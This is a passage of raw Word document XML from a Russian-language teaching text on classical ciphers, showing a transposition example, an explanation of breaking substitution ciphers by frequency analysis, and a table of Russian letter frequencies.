          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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Н</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="46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И</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5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Е</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="46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И</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9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20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="338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5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Н</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="320" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom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Ф</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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О</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="46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Р</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5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М</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="46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А</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9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20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="338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5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Ц</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="320" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom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И</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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И</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4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52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9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431"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="388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ВАРИАНТ КОДА А:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="32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000" w:type="dxa"/>
            <w:gridSpan w:val="6"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:left="40"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>ВАРИАНТ КОДА Б:</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00B45DB0">
        <w:trPr>
          <w:trHeight w:val="230"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="388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Ключ: 6 столбцов</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3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0" w:type="dxa"/>
            <w:gridSpan w:val="6"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:left="40"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>Ключевое слово: данные</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00B45DB0">
        <w:trPr>
          <w:trHeight w:val="259"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="388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ОЖНЦТЕФИОНОИБИРРЕМАИА</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="32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000" w:type="dxa"/>
            <w:gridSpan w:val="6"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:left="40"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="92"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="92"/>
              </w:rPr>
              <w:t>ТЕФИОЖНЦАИАОНОИБИРРЕМ</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="195" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="0" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>При использовании метода подстановки в простейшем случае для дешифрации ключ может</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="49" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pP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быть известен или находится путем визуального анализа шифрованного сообщения</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="0" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="23"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>(например, порядковые номера букв в алфавите), а при неизвестном ключе применяется</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="12" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pP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методы статистического анализа.</w:t>
      </w:r>
    </w:p>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10 15 22 16 18 14 1 24 10 33 – ИНФОРМАЦИЯ</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="226" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="245" w:lineRule="auto"/>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Повторяемость ключевого слова при наличии достаточно большого объема у шифра накладывает некоторый отпечаток на криптограмму, а это может быть обнаружено статистическими методами, которые позволяют судить о длине ключевого слова, после чего расшифровка значительно упрощается.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="3" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="254" w:lineRule="auto"/>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="23"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Для этого в шифрованном сообщении определяется абсолютные и относительные показатели повторяемости отдельных символов (частоты и частости). Затем производится их ранжирование, для чего необходимо упорядочить относительные частоты повторяемости по убыванию. После этого необходимо установить тесноту и характера корреляционной связи между рядом распределения исходного сообщения и типичным рядом распределения относительных частот повторяемости букв русского алфавита.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="182" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="2470" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:top w:w="0" w:type="dxa"/>
          <w:left w:w="0" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1420"/>
        <w:gridCol w:w="1140"/>
        <w:gridCol w:w="920"/>
        <w:gridCol w:w="1240"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00B45DB0">
        <w:trPr>
          <w:trHeight w:val="240"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1420" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="auto"/>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Буква</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="11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Частость</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="92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Буква</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="12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Частость</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00B45DB0">
        <w:trPr>
          <w:trHeight w:val="201"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1420" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="auto"/>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пробел, знак</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="114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0,175</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="920" w:type="dxa"/>
            <w:tcBorders>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="201" w:lineRule="exact"/>
              <w:ind w:left="80"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>П</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="124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0,023</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00B45DB0">
        <w:trPr>
          <w:trHeight w:val="25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препинания</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А</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0,062</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Р</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0,040</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Б</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0,014</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С</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0,045</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В</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0,038</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Т</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0,053</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Г</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0,013</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У</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0,021</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Д</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0,025</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Ф</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0,002</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Е</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0,084</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Х</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0,009</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Ё</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0,001</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Ц</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0,004</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Ж</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0,009</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Ч</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0,012</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:sectPr w:rsidR="00B45DB0" w:rsidRPr="00B45DB0">
          <w:pgSz w:w="11900" w:h="16840"/>
          <w:pgMar w:top="829" w:right="840" w:bottom="499" w:left="1420" w:header="0" w:footer="0" w:gutter="0"/>
          <w:cols w:space="0" w:equalWidth="0">
            <w:col w:w="9640"/>
          </w:cols>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="2470" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:top w:w="0" w:type="dxa"/>
          <w:left w:w="0" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1420"/>
        <w:gridCol w:w="1140"/>
        <w:gridCol w:w="920"/>
        <w:gridCol w:w="1240"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00B45DB0">
        <w:trPr>
          <w:trHeight w:val="240"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1420" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="auto"/>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bookmarkStart w:id="13" w:name="page13"/>
            <w:bookmarkEnd w:id="13"/>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>З</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="11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right="500"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>0,016</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="92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Ш</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="12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right="580"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>0,006</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И</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0,062</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Щ</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0,003</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Й</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0,012</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Ъ</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0,004</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К</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0,028</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Ы</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0,018</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Л</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0,035</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Ь</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0,016</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М</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0,026</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Э</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0,003</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Н</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0,053</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Ю</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0,006</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О</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0,090</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Я</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0,018</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="207" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="244" w:lineRule="auto"/>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>При этом необходимо учитывать как синтаксический аспект исходного сообщения, начиная с расшифровку с наиболее вероятных совпадений тесно коррелирующих символов (пробел, буквы О, Е, А и т.д.) и разбивая исходный текст на структурные блоки, так и семантический аспект сообщения, устанавливая отношение отдельных элементов шифра к общей системе.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="1" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="0" w:lineRule="atLeast"/>
        <w:ind w:left="700"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Например, расшифруем следующий код методом подстановки без ключа:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="22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40"/>
        <w:gridCol w:w="380"/>
        <w:gridCol w:w="400"/>
        <w:gridCol w:w="400"/>
        <w:gridCol w:w="400"/>
        <w:gridCol w:w="400"/>
        <w:gridCol w:w="400"/>
        <w:gridCol w:w="400"/>
        <w:gridCol w:w="380"/>
        <w:gridCol w:w="400"/>
        <w:gridCol w:w="400"/>
        <w:gridCol w:w="200"/>
        <w:gridCol w:w="60"/>
        <w:gridCol w:w="40"/>
        <w:gridCol w:w="100"/>
        <w:gridCol w:w="340"/>
        <w:gridCol w:w="240"/>
        <w:gridCol w:w="380"/>
        <w:gridCol w:w="400"/>
        <w:gridCol w:w="400"/>
        <w:gridCol w:w="400"/>
        <w:gridCol w:w="400"/>
        <w:gridCol w:w="220"/>
        <w:gridCol w:w="180"/>
        <w:gridCol w:w="400"/>
        <w:gridCol w:w="380"/>
        <w:gridCol w:w="400"/>
        <w:gridCol w:w="400"/>
        <w:gridCol w:w="140"/>
        <w:gridCol w:w="60"/>
        <w:gridCol w:w="40"/>
        <w:gridCol w:w="60"/>
        <w:gridCol w:w="100"/>
      </w:tblGrid>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25</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11</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11</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12</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rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="70"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>26</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33</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="40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400" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="008080"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:right="80"/>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12</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22</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008080"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:left="240"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>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rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="70"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>26</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15</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23</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13</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color w:val="FFFF00"/>
                <w:w w:val="99"/>
                <w:highlight w:val="darkCyan"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="FFFF00"/>
                <w:w w:val="99"/>
                <w:highlight w:val="darkCyan"/>
              </w:rPr>
              <w:t>22</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="38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color w:val="FFFF00"/>
                <w:w w:val="99"/>
                <w:highlight w:val="darkCyan"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="FFFF00"/>
                <w:w w:val="99"/>
                <w:highlight w:val="darkCyan"/>
              </w:rPr>
              <w:t>14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30</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="008080"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:left="200"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="89"/>
                <w:highlight w:val="darkCyan"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="89"/>
                <w:highlight w:val="darkCyan"/>
              </w:rPr>
              <w:t>26</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18</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="100" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="008080"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="008080"/>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15</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24</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="300" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="008080"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:left="100"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="79"/>
                <w:highlight w:val="darkCyan"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="79"/>
                <w:highlight w:val="darkCyan"/>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13</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11</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24</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13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="38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23</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8</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29</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21</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30</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18</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14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="38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008080"/>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32</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6</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38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400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="008080"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exact"/>
              <w:ind w:right="80"/>
              <w:jc w:val="right"/>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228" w:lineRule="exact"/>
              <w:ind w:left="4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left="40"/>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28</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21</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14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="38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color w:val="FFFF00"/>
                <w:w w:val="99"/>
                <w:highlight w:val="darkCyan"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="FFFF00"/>
                <w:w w:val="99"/>
                <w:highlight w:val="darkCyan"/>
              </w:rPr>
              <w:t>31</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="008080"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exact"/>
              <w:ind w:right="40"/>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right="40"/>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23</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="260" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="008080"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exact"/>
              <w:ind w:left="60"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="FFFF00"/>
                <w:w w:val="89"/>
                <w:highlight w:val="darkCyan"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
